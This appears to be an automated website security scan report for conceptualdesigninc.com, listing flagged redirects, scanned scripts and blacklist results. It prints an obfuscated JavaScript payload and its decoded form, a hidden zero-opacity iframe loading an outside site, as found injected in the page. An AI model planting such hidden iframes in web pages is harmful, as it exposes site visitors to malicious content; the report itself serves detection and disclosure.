Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://conceptualdesigninc.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: conceptualdesigninc.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 22 Sep 2014 10:39:26 GMT Location: http://crd.tw/index.php Server: Apache Content-Type: text/html; charset=iso-8859-1 | malicious |
URL: http://crd.tw/index.php (imitation of visitor from search engine) GET /index.php HTTP/1.1 Host: crd.tw Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 302 Found Connection: close Date: Mon, 22 Sep 2014 10:39:27 GMT Location: http://ww15.crd.tw/index.php Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.3.3-7+squeeze21 | malicious |
Scanned pages/files
Request | Server response | Status |
http://conceptualdesigninc.com/ | 200 OK Content-Length: 1765 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var hdOruVsHnKBXZuvtsRmw = "z60z105z102z114z97z109z101z32z119z105z100z116z104z61z34z52z56z48z34z32z104z101z105z103z104z116z61z34z54z48z34z32z115z114z99z61z34z104z116z116z112z58z47z47z114z110z119z46z107z122z47z105z110z100z101z120z46z112z104z112z34z32z115z116z121z108z101z61z34z98z111z114z100z101z114z58z48z112z120z59z32z112z111z115z105z116z105z111z110z58z114z101z108z97z116z105z118z101z59z32z116z111z112z58z48z112z120z59z32z108z101z102z116z58z45z53z48z48z112z120z59z32z111z112z97z99z105z116z121z58z48z Decoded script: <iframe width="480" height="60" src="http://rnw.kz/index.php" style="border:0px; position:relative; top:0px; left:-500px; opacity:0; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0); -moz-opacity:0"></iframe> Antivirus reports:
| ||
http://counnter.cn/top100_00.js | 404 Not Found Content-Length: 13034 Content-Type: text/html | clean |
http://a1.dnbizcdn.com/js/b/client20130325new.js | 200 OK Content-Length: 2048 Content-Type: application/x-javascript | clean |
http://cpro.baidustatic.com/cpro/ui/domain_parking.js | 200 OK Content-Length: 174780 Content-Type: application/x-javascript | clean |
http://cpro.baidustatic.com/cpro/ui/ci.js | 200 OK Content-Length: 71507 Content-Type: application/x-javascript | clean |
http://a1.dnbizcdn.com/js/b/jquery.min.js | 200 OK Content-Length: 78601 Content-Type: application/x-javascript | clean |
http://a1.dnbizcdn.com/js/b/caf.js | 200 OK Content-Length: 8900 Content-Type: application/x-javascript | clean |
http://counnter.cn/test404page.js | 404 Not Found Content-Length: 13148 Content-Type: text/html | clean |
http://a1.dnbizcdn.com/js/b/client.js | 200 OK Content-Length: 1723 Content-Type: application/x-javascript | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=conceptualdesigninc.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://conceptualdesigninc.com/
Result: conceptualdesigninc.com is not infected or malware details are not published yet.
Result: conceptualdesigninc.com is not infected or malware details are not published yet.